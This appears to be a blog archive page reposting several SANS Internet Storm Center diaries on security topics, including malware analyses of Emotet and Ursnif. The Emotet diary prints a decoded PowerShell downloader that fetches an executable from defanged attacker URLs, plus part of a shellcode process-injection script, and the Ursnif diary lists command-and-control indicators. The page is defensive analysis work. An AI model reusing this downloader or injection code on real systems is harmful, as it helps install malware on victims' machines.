Archive for SANS

Network Security Perspective on Coronavirus Preparedness, (Mon, Jan 27th)

With the new Coronavirus outbreak starting to dominate the news, I want to go over some cybersecurity effects of a disease like this that you should prepare for.

There are two cybersecurity-related aspects of an emergency like this:

  • Fraud and other ways of how criminals try to take advantage of situations like this.
  • Business continuity preparedness.

In past disasters, we have seen different ways of how criminals try to take advantage of a situation like this:

  1. Fake Donations

Various entitles have already started to register domain names around the name “coronavirus.” In past events, we have seen some of these domains being used for fake donation web sites. They may also be used for other less legitimate business purposes like selling overpriced supplies. At this point, all the domains I have seen are parked or not yet active with content, so it is hard to tell what will happen.

  1. Malware

Malware authors are always looking for new ruses to get people to open their attachment. In the past, we have seen malicious videos and other attachments being used to spread malware.

  1. Fake News

Fake news is not only used to influence elections. Sometimes it is done to attract more eyeballs to a YouTube channel. Be careful who you trust, and don’t let sensational news cause you to panic. Panic is not the right state to make sensible decisions.

Please let us know if you see any of this.

From a business continuity perspective, I like the CDC checklist ( ). I only highlight some items from it. Another excellent resource is the response plan published by Public Health England:

I only highlight some items from it.

First of all: Unless your business is supporting critical infrastructure or healthcare, employee safety has to come before business continuity. Sometimes it is just best to shut down and go home until the crisis is over.

  1. Remote Access

Even during a relatively mild outbreak, people may not be willing or able to come to work. Even for the common flu, it is much preferred for someone to stay at home and maybe do a little bit of work vs. coming to work and infecting others (remember the flu is estimated to kill 8,200-20,000 people this season in the US alone). You must have functional and secure remote access set up. There are several different VPN and similar solutions. Voice and video conferencing solutions should be part of this. It should be easy for people to stay at home for a few days. You may also want to consider loaner laptops. It is much simpler and more secure to have employees working from home use corporate computers with a known secure configuration vs. using a random home computer. Test remote access while you still have people in the office to fix issues. This is in particular important if you need remote access for administrative purposes like rebooting systems. Many organizations have migrated systems to the cloud and should be used to manage them remotely (but if you did it right, you may have whitelisted specific IPs for remote management access)

In a pandemic situation, the remote access solution may be the resource that is constrained. Considerations should be put into investigating shorter timeout value and determine who are the critical users to be put in a special group for more extended and continuous access. Regular users can have a different profile to consume less load on the VPN equipment.

  1. Biometric Identification

Many biometric identification systems are problematic. Fingerprint scanners often do not work with gloves or can be a conduit for infection. Facial recognition does not work while someone is wearing a mask. Devise some alternative means to authenticate for emergency access. At the very least, have some sanitizer ready to clean surfaces people need to touch to authenticate.

  1. When and How to Shut Down

In some cases, it may be best to just shut down for a while If your business is not part of the health care or critical infrastructure. Business continuity plans should not endanger anybody’s life. Have a plan for when and how to shut down. Which systems are shut down first? How can we reduce the load on system administrators and security analysts, so fewer of them have to come to work? If you decide to shut down all the way: How do you ensure some physical security of your space (boarding up, a company monitoring the space?).

  1. Supply Chain Continuity

It appears to be already apparent that the Chinese economy will, at least in the short term, be significantly affected. Some of the effects are delayed due to scheduled shutdowns during the lunar new year. Of course, similar travel restrictions could also affect other countries. How many critical supplies do you have on-site? Most modern businesses try very hard to minimize the amount of inventory, which in turn makes them very vulnerable to supply disruptions. The availability of supplies could also affect your decision to shut down. Do not overlook your “internal supply chain”. Which locations/individuals are critical to your operations?

  1. Emergency communication plan

Now is an excellent time to make sure your phone lists are up to date. Make sure critical people can be reached. If possible, there should be diverse methods to reach each other (really hard to do with “everything over IP”). Another part of this is how the organization will communicate its plan to employees, suppliers, and customers. There should be multiple means, and they need to be communicated ahead of time. (Website, Twitter, phone number to call). Miscreants may exploit any weakness in your communication plan to spread rumors about your organization or to impersonate your company. Your escalation plan should be included in the review of your communication plan.

  1. How can you help others?

During a crisis, first responders will likely soon get worn out and need support. There may also be assets (space, materials…) that your company does not need right now that you can use to help. Typically, this can only happen if you made necessary connections ahead of time.

And of course: Please let me know what else should be noted (or point out any mistakes I made above)

Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Is Threat Hunting the new Fad?, (Sat, Jan 25th)

Over the past two years a lot of articles, processes, techniques and tools have been published on how to do Threat Hunting. I have been following the trend with great interest whether it be which process works best, methods and procedures to follow and adapt to your environment, and finally logs or tools that can help the hunt.

I have taken a simplistic approach to Threat Hunting and for me it is: Proactively searching for threats missed by every defenses in the enterprise. We are Threat Hunting for the unknown! Assume something is already compromised.

That is a tall order, where do we start? There first step is to know the network I’m defending. In order to do this well, it means to have a pretty good knowledge what the network looks like (i.e. network diagrams, traffic flows, client → server relationship, etc) and the type of activity considered normal. Anything deviating from that “normal” need to be investigated.

The next step is to collect the logs that will help with the hunt; such as host and network logs to fuse traffic flow in a way that can help identify unusual pattern of activity.

Some of the logs that might be important to collect (not exhaustive) might be: proxy, web & application servers, DNS, host-based, antivirus, EndPoint Detection Response (EDR), firewall, etc. In the end, each organization is unique. Using the Mitre ATT&CK framework can help the hunt by identifying the tactics and techniques that will help capture the most promising logs to detect and identify unusual behavior happening in the network.

Over the years, several handlers have published various articles on Threat Hunting whether it be process, methods or tools like rita [1][2] or HELK [3] to help with the hunt.

If you are interested in learning how to conduct Threat Hunting in your network and missed Active Countermeasures’ last course, they are conducting another free, one-day, Cyber Threat Hunting Training online course on the 4 April where you can see the course content and register here.


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Visibility Gap of Your Security Tools, (Sat, Jan 25th)

I have been focusing on visibility lately and often specifically on gaps. Visibility gaps demand the attention of every cybersecurity professional. Success often hinges on how quickly these gaps get closed. The very act of which helps us achieve what they need the most – greater visibility. Solving for these gaps will equip us by catalyzing transformation. No need for Artificial Intelligence or Machine Learning, just an advanced persistent drive to close these visibility gaps!
I introduced this idea in a previous Diary Is Your SOC Flying Blind?  This time, I want to focus on your security agents. Are they working and providing their intended value? How do you know? What would it look like to have an Agent Health Dashboard that answered two fundamental questions all day long:
        Is the agent installed?
        Is the agent performing its expected role?
I like to include practical ideas when I am the Handler. To that end, I developed several ideas across several diverse dimensions for you to consider. Perhaps next week, you will use this as a checklist to complete or perform a spot check.
Visibility for your developers and DBAs
  Number of active sessions
  Number of runaway sessions
  Application performance metrics
Visibility for your physical security
  Camera feeds
  Badges that show to be both inside and outside of the building at the same time
Visibility for your networks
  Netflow volume
  Traffic volume 
  New ports and services
  Trends over time for each
Visibility for your Servers and Workstations
   Day log volume
   Communication patterns
   Lateral movement detection
   Trends over time for each
   Alert when devices stop sending their logs 
   Activity performed by administrators
Application question – What visibility gaps exist, and what can you do next week on purpose to close one of them? Please leave your ideas and suggestions in our comments box!
Russell Eubanks

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Why Phishing Remains So Popular?, (Fri, Jan 24th)

… because it works!

Probably, some phishing emails get delivered into your mailbox every day and you ask yourself: “Why do they continue to spam us with so many emails? We are aware of phishing and it will not affect my organization!”

First of all, emails remain a very popular way to get in content with the victim. Then, sending massive phishing campaigns does not cost a lot of money. You can rent a bot to send millions of emails for a few bucks. Hosting the phishing kit is also very easy. They are tons of compromised websites that deliver malicious content. But phishing campaigns are still valuable from an attacker perspective when some conditions are met:

  1. The mail is properly crafted and looks like an official one (same layout, signature, no typo, correct sentences, same “style”)
  2. The mail attracts the victim’s attention (based on an event, a colleague, some “juicy” topics)
  3. Make the victim confident (pretend to use the tools and services used at work)
  4. The victim is not attentive to the content of the mail or the link (lack of concentration)

Here is a real story. Yesterday my wife explained that she felt into the trap! She was on the phone with a customer and, waiting for some feedback, she received an email from a colleague (a legit email she said – all details looked ok – signature, name, etc). That’s the condition #1 from the list above. Her colleague pretended to share a file about a project via OneNote (Conditions #2 and #3). She knows the sender and she works on projects with him and the organization has the full Microsoft products stack. So, while waiting on the phone, she clicked on the link, got the classic login page and provided her credentials… (condition #4). She said, “I know that they take security seriously so it looked normal to authenticate one more time”.

She did not see that the URL was, of course, not the right one (speaking with the customer at the same time). When her credentials were rejected several times, she realized that it was a phishing attempt and changed her credentials immediately. In the meantime, the helpdesk sent an email to all employees to report the ongoing phishing attack! Probably, she was the patient “zero”.

Conclusion: awareness is key, you might feel confident at detecting phishing attempts but just one second of distraction and it’s game over!

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Complex Obfuscation VS Simple Trick, (Thu, Jan 23rd)

Today, I would like to make a comparison between two techniques applied to malicious code to try to bypass AV detection.

The Emotet malware family does not need to be presented. Very active for years, new waves of attacks are always fired using different infection techniques. Yesterday, an interesting sample was spotted at a customer. The security perimeter is quite strong with multiple lines of defenses based on different technologies/vendors. This one passed all the controls! A malicious document was delivered via a well-crafted email. The document (SHA256:ff48cb9b2f5c3ecab0d0dd5e14cee7e3aa5fc06d62797c8e79aa056b28c6f894) has a low VT score of 18/61[1] and is not detected by some major AV players.

When you open the document, you see a classic message asking to enable macros:

It contains a lot of macros: 

[email protected]:/tmp# b0199e708ccd55cd5dbd8c3044bcb3d3.doc
  1:      4096 'x05DocumentSummaryInformation'
  2:       416 'x05SummaryInformation'
  3:      6952 '1Table'
  4:    173280 'Data'
  5:        97 'Macros/Aaqpwcyjy/x01CompObj'
  6:       266 'Macros/Aaqpwcyjy/x03VBFrame'
  7:        38 'Macros/Aaqpwcyjy/f'
  8:         0 'Macros/Aaqpwcyjy/o'
  9:        97 'Macros/Aurgxwib/x01CompObj'
 10:       265 'Macros/Aurgxwib/x03VBFrame'
 11:        38 'Macros/Aurgxwib/f'
 12:         0 'Macros/Aurgxwib/o'
 13:        97 'Macros/Bowmosjym/x01CompObj'
 14:       266 'Macros/Bowmosjym/x03VBFrame'
 15:        38 'Macros/Bowmosjym/f'
 16:         0 'Macros/Bowmosjym/o'
 17:        97 'Macros/Byzayjrzopom/x01CompObj'
 18:       269 'Macros/Byzayjrzopom/x03VBFrame'
 19:        38 'Macros/Byzayjrzopom/f'
 20:         0 'Macros/Byzayjrzopom/o'
 21:        97 'Macros/Dwvsngqx/x01CompObj'
 22:       265 'Macros/Dwvsngqx/x03VBFrame'
 23:        38 'Macros/Dwvsngqx/f'
 24:         0 'Macros/Dwvsngqx/o'
 25:        97 'Macros/Edloxjeo/x01CompObj'
 26:       265 'Macros/Edloxjeo/x03VBFrame'
 27:        38 'Macros/Edloxjeo/f'
 28:         0 'Macros/Edloxjeo/o'
 29:        97 'Macros/Gkzhprtrh/x01CompObj'
 30:       266 'Macros/Gkzhprtrh/x03VBFrame'
 31:        38 'Macros/Gkzhprtrh/f'
 32:         0 'Macros/Gkzhprtrh/o'
 33:        97 'Macros/Gvvqnzjwxfuan/x01CompObj'
 34:       270 'Macros/Gvvqnzjwxfuan/x03VBFrame'
 35:        38 'Macros/Gvvqnzjwxfuan/f'
 36:         0 'Macros/Gvvqnzjwxfuan/o'
 37:        97 'Macros/Ihxxfvrwmsl/x01CompObj'
 38:       268 'Macros/Ihxxfvrwmsl/x03VBFrame'
 39:        38 'Macros/Ihxxfvrwmsl/f'
 40:         0 'Macros/Ihxxfvrwmsl/o'
 41:        97 'Macros/Jvfzzjbxrowh/x01CompObj'
 42:       269 'Macros/Jvfzzjbxrowh/x03VBFrame'
 43:        38 'Macros/Jvfzzjbxrowh/f'
 44:         0 'Macros/Jvfzzjbxrowh/o'
 45:        97 'Macros/Mtjtwicbsd/x01CompObj'
 46:       294 'Macros/Mtjtwicbsd/x03VBFrame'
 47:       690 'Macros/Mtjtwicbsd/f'
 48:       112 'Macros/Mtjtwicbsd/i09/x01CompObj'
 49:        44 'Macros/Mtjtwicbsd/i09/f'
 50:         0 'Macros/Mtjtwicbsd/i09/o'
 51:       112 'Macros/Mtjtwicbsd/i11/x01CompObj'
 52:        44 'Macros/Mtjtwicbsd/i11/f'
 53:         0 'Macros/Mtjtwicbsd/i11/o'
 54:     17548 'Macros/Mtjtwicbsd/o'
 55:      1627 'Macros/PROJECT'
 56:        97 'Macros/Qimyzezwop/x01CompObj'
 57:       267 'Macros/Qimyzezwop/x03VBFrame'
 58:        38 'Macros/Qimyzezwop/f'
 59:         0 'Macros/Qimyzezwop/o'
 60:        97 'Macros/Qpxofroiwd/x01CompObj'
 61:       267 'Macros/Qpxofroiwd/x03VBFrame'
 62:        38 'Macros/Qpxofroiwd/f'
 63:         0 'Macros/Qpxofroiwd/o'
 64:        97 'Macros/Tpklalyhfljol/x01CompObj'
 65:       270 'Macros/Tpklalyhfljol/x03VBFrame'
 66:        38 'Macros/Tpklalyhfljol/f'
 67:         0 'Macros/Tpklalyhfljol/o'
 68: m    1168 'Macros/VBA/Aaqpwcyjy'
 69: m    1166 'Macros/VBA/Aurgxwib'
 70: m    1168 'Macros/VBA/Bowmosjym'
 71: m    1172 'Macros/VBA/Byzayjrzopom'
 72: m    1166 'Macros/VBA/Dwvsngqx'
 73: m    1167 'Macros/VBA/Edloxjeo'
 74: M    8509 'Macros/VBA/Fpbluteic'
 75: m    1168 'Macros/VBA/Gkzhprtrh'
 76: m    1170 'Macros/VBA/Gvvqnzjwxfuan'
 77: m    1168 'Macros/VBA/Ihxxfvrwmsl'
 78: m    1170 'Macros/VBA/Jvfzzjbxrowh'
 79: m    1168 'Macros/VBA/Mtjtwicbsd'
 80: M    1297 'Macros/VBA/Qbfgynhpfd'
 81: m    1169 'Macros/VBA/Qimyzezwop'
 82: m    1169 'Macros/VBA/Qpxofroiwd'
 83: m    1172 'Macros/VBA/Tpklalyhfljol'
 84: m    1168 'Macros/VBA/Wizfuemxxtf'
 85: m    1167 'Macros/VBA/Yxjeviftd'
 86:     13896 'Macros/VBA/_VBA_PROJECT'
 87:      2278 'Macros/VBA/__SRP_0'
 88:       170 'Macros/VBA/__SRP_1'
 89:       304 'Macros/VBA/__SRP_2'
 90:       103 'Macros/VBA/__SRP_3'
 91:      1655 'Macros/VBA/dir'
 92:        97 'Macros/Wizfuemxxtf/x01CompObj'
 93:       268 'Macros/Wizfuemxxtf/x03VBFrame'
 94:        38 'Macros/Wizfuemxxtf/f'
 95:         0 'Macros/Wizfuemxxtf/o'
 96:        97 'Macros/Yxjeviftd/x01CompObj'
 97:       266 'Macros/Yxjeviftd/x03VBFrame'
 98:        38 'Macros/Yxjeviftd/f'
 99:         0 'Macros/Yxjeviftd/o'
100:      4096 'WordDocument'

The section #80 contains the Document_Open() macro:

Private Sub Document_open()
End Sub

And the section #74 contains the malicious macro itself:

[email protected]:/tmp# b0199e708ccd55cd5dbd8c3044bcb3d3.doc -v -s 74|head -20
Attribute VB_Name = "Fpbluteic"
Function Rrjetvrunb()
   ReDim Pjchunjdvhhkn(3)
Pjchunjdvhhkn(0) = 34
Pjchunjdvhhkn(1) = 345
Pjchunjdvhhkn(2) = 6666
Uxdzokmpe = 849
Bpmyuascqdm = CLng(77)
Bluxtzkss = Oct(24 * Sgn(13) - UJxPE48 * 34)
Nlgostxvgu = Sin(HoPjA4 / CLng(34) + zIVMk49r * Fix(1))
Ncbmlghku = ChrW(I + wdKeyP)
   ReDim Pjchunjdvhhkn(3)
Pjchunjdvhhkn(0) = 34
Pjchunjdvhhkn(1) = 345
Pjchunjdvhhkn(2) = 6666
Sebkmtyip = 849
Bcxznucp = CLng(77)
Pvoawmwk = Oct(24 * Sgn(13) - UJxPE48 * 34)
Pvjtspxzzttzi = Sin(HoPjA4 / CLng(34) + zIVMk49r * Fix(1))
Fymbyplsyh = Ncbmlghku + Mtjtwicbsd.Njrmohrydyi + Mtjtwicbsd.Ozqdaobluxyt

Different obfuscation techniques are used like this one. FIrst, a lot of unused code is inserted. Then, the macro is obfuscated with groups of characters used as a separator. Letters are extracted in an array that is “joined” later to build the string:

dv = "i/sJnjK==//sad/sJnjK==//sadnm/sJnjK==//sadg/sJnjK==//sad/sJnjK==//sadm/sJnjK==//sadt" + ChrW(wdKeyS) + 
":/sJnjK==//sadw/sJnjK==//sad/sJnjK==//sadi/sJnjK==//sadn3/sJnjK==//sad2/sJnjK==//sad_" + Mtjtwicbsd.Eztddaol + 
fd = "/sJnjK==//sad"
Qrdkcdxapv = Split("/sJnjK==//sad/sJnjK==//sadw/sJnjK==//sad/sJnjK==//sad" + dv + T, fd) 
Ldltzzvlia = Join(Qrdkcdxapv, "")

The variable ‘Ldltzzvlia’ contains: 

winmgmt" + ChrW(wdKeyS) + ":win32_" + Mtjtwicbsd.Eztddaol + "rocess

The macro launches a Powershell script with a long Base64 encoded payload:


Here is the decoded string:

$Wocgcesio='Pqcvqskj';$Ulfiwvmlyjk = '911';$Yedelhmjclzu='Ndozzfffcsg';$Xhmvpctbpjqe=$env:userprofile+''+ 
$Ulfiwvmlyjk+'.exe';$Ufzasubqxcx='Vfesqwfico';$Jrakygjlzls=.('n'+'ew-ob'+'ject') neT.WEBcLIEnt; 
$Ngvszfsvxf='*hxxps://wwwblog[.]loanwalle[.]com/cgi-bin/Mz7m8a7H/*hxxp://luisaramazzotti[.]com/8pkb7/MhEu4080/*hxxp://51[.]15[.]206[.]214/dp_world_staging/uploads/content/sustainability/AqGCnlJ0cM/*hxxp://35[.]188[.]191[.]27/terranovas/1zEWKX/'"sPl`It"([char]42);$Yiotbkyrrr='Kgzvwpaq';foreach($Opbokjlb in $Ngvszfsvxf){try{$Jrakygjlzls."DOw`NL`o`ADFIlE"($Opbokjlb, $Xhmvpctbpjqe); 
$Jabjckoirrd='Mmxwszbtdcbh';If ((('G'+'et-It'+'em') $Xhmvpctbpjqe)."L`e`NGTH" -ge 27390)  

The payload 911.exe is downloaded from one of those URLs:


The Emotet dropped payload is called 911.exe (SHA256:c2fb228e924d84f00f3cff29f1e6bf243c2600806fed26c0086b69c1b4839f57) and has a score of 9/73[2]. 

If the obfuscation techniques used in the macro are complex, sometimes we can have the opposite and attackers are trying to defeat basic controls. Here is another sample that I found (a malicious Powershell script that performs process injection). Nothing new but I was surprised by the line present at the beginning of the script:

Set-StrictMode -Version 2


$DoIt = @'
$assembly = @"
  using System;
  using System.Runtime.InteropServices;
  namespace inject {
    public class func {
      [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
      [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
      [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
      [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
      [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
      [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider
$params = New-Object System.CodeDom.Compiler.CompilerParameters
$params.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$params.GenerateInMemory = $True
$result = $compiler.CompileAssemblyFromSource($params, $assembly)

[Byte[]]$var_code = [System.Convert]::FromBase64String("TVpBUlVIieVIgewgAAAASI...

You can see the classic EICAR test file[3]. I was wondering why to write something that should normally trigger all antivirus on the market. I asked on Twitter and I had an interesting reply:

Indeed the file has a very low score of… 6/37![4]. Probably most AV’s stop processing the file when then triggered a low-risk signature.

Sometimes, a simple trick is enough to bypass security controls…


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

German language malspam pushes Ursnif, (Wed, Jan 22nd)


On Tuesday 2020-01-21, a wave of malicious spam (malspam) hit various recipients in Germany.  Messages from this German malspam were email chains associated with infected Windows hosts, and these emails all had password-protected zip archives as attachments.  A closer look revealed this malspam was pushing Ursnif.

Today’s diary reviews this malspam and an Ursnif infection from one of the attachments on Tuesday 2020-01-21.

Shown above:  Flow chart for an infection from this wave of German malspam.

The malspam

See the next three images for examples from this wave of malspam.  Of note, this campaign often used 777 as the password for the attached zip archive.  In this wave of malspam, we saw passwords 111, 333, and 555.  Other passwords were probably used as well in examples we have not yet reviewed.

Shown above:  An example of the malspam from Tuesday 2020-01-21 (1 of 3).

Shown above:  An example of the malspam from Tuesday 2020-01-21 (2 of 3).

Shown above:  An example of the malspam from Tuesday 2020-01-21 (3 of 3).

The attachments

Using the password from the email, you can extract a Microsoft Word document from the password-protected zip archive.  The message in the Word document is in German, and it directs you to enable macros.  All of the Word documents are named info_01_21.doc.  Of note, in recent versions of Microsoft Office, you must disable Protected Mode and bypass some other security features to enable macros and infect a vulnerable Windows host.

Shown above:  Extracting a Word document from one of the password-protected zip archives.

Shown above:  An example of an extracted Word document.

The infection traffic

Infection traffic is typical for Ursnif infections in recent months.  Other examples of Ursnif traffic can be found here, which contains infections from 2019.  Of note, the follow-up malware for this Ursnif infection was another Ursnif variant.

Shown above:  Traffic from an infection filtered in Wireshark.

Forensics on an infected Windows host

The infected windows host contained artifacts commonly seen with these type of Ursnif infections.  See the images below for details.

Shown above:  Artifacts in seen the C:WindowsTemp directory after enabling macros.

Shown above:  Follow-up malware found on the infected Windows host.

Shown above:  Update to the Windows registry caused by Ursnif to keep it persistent on the infected host.

Indicators of Compromise (IoCs)

Infection traffic from the initial Ursnif infection:

  • 80.85.157[.]246 port 80 – emblareppy[.]com GET /gunshu/lewasy.php?
  • port 80 –[.]com – GET /images/[long string].avi
  • 80.85.153[.]218 port 80 – pzhmnbarguerite4819[.]com – GET /images/[long string].avi
  • 95.169.181[.]33 port 80 – n60peablo[.]com – GET /images/[long string].avi
  • port 443 –[.]com – HTTPS traffic
  • 45.141.103[.]204 port 443 – nk47yicbnnsi[.]com – HTTPS traffic

Request for the follow-up malware:

  • 104.193.252[.]157 port 80 – 104.193.252[.]157 – GET /fonelsid.rar

Infection traffic caused by the follow-up malware (another Ursnif variant):

  • port 80 – google[.]com – GET /
  • port 80 –[.]com – GET /
  • DNS queries for onionpie[.]at – no response from the server
  • DNS queries for tahhir[.]at – no response from the server
  • 80.249.145[.]116 port 80 – limpopo[.]at – GET /images/[long string]
  • 109.175[.]7.8 port 80 – estate-advice[.]at – GET /images/[long string]
  • 5.56.73[.]146 port 80 – sweetlights[.]at – GET /g32.bin
  • 5.56.73[.]146 port 80 – sweetlights[.]at – GET /g64.bin
  • 5.56.73[.]146 port 80 – estate-advice[.]at – POST /images/[long string]
  • 185.95.185[.]58 port 80 – estate-advice[.]at – GET /images/[long string]
  • 80.249.145[.]116 port 80 – limpopo[.]at – POST /images/[long string]
  • 51.223.47[.]15 port 80 – estate-advice[.]at – POST /images/[long string]

Malware info:

SHA256 hash: 957573dc5e13516da0d01f274ab28a141dddc8b6609fa35fde64a4900cb793e6

  • File size: 127,243 bytes
  • File name: info_12_21.doc
  • File description: Word doc with macro for Ursnif

SHA256 hash: 05ec03276cdbb36fdd8433beca53b6c4a87fa827a542c5d512dcbb2cf93023c9

  • File size: 3,651 bytes
  • File location: C:WindowsTempaxsUG8.xsl
  • File description: XSL file dropped by Word macro

SHA256 hash: c7f801c491d705cd5e6a202c7c5084874235e19b5505d8e0201111cb3789a9c8

  • File size: 265,216 bytes
  • File location: hxxp://emblareppy[.]com/gunshu/lewasy.php?
  • File location: C:WindowsTempaaNuLh.dll
  • File description: Ursnif DLL file retrieved using XSL file
  • DLL note: “C:WindowsSystem32rundll32.exe” c:WindowsTempaaNuLh.dll,DllRegisterServer

SHA256 hash: df824e3e5bb15c7b74d5e8a021f3cbcd867100a02399b9c383488c660ae920b4

  • File size: 873,472 bytes
  • File location: hxxp://104.193.252[.]157/fonelsid.rar
  • File location: C:Users[username]AppDataLocalTemp[random digits].exe
  • File description: Follow-up malware, another Ursnif variant
  • File location note: binary returned from fonelsid.rar URL was encoded/encrypted as it was sent over the network

Final words

A pcap of the infection traffic, the associated malware and artifacts, and some malspam examples can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 1 of 319 12345...»